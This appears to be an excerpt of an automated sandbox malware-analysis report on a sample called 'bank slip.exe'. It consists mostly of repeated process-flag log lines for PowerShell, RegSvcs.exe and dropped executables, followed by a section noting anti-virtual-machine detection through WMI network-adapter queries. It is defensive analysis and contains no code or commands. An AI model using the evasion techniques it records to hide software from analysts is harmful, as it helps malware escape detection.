                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Yara detected AntiVM3
                        Source: Yara matchFile source: Process Memory Space: bank slip.exe PID: 6756, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: mKSjGvfmIulVB.exe PID: 7552, type: MEMORYSTR
                        Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Users\user\Desktop\bank slip.exeMemory allocated: 2380000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeMemory allocated: 25C0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeMemory allocated: 24D0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeMemory allocated: 6EE0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeMemory allocated: 7EE0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeMemory allocated: 8080000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeMemory allocated: 9080000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeMemory allocated: 1430000 memory reserve | memory write watchJump to behavior
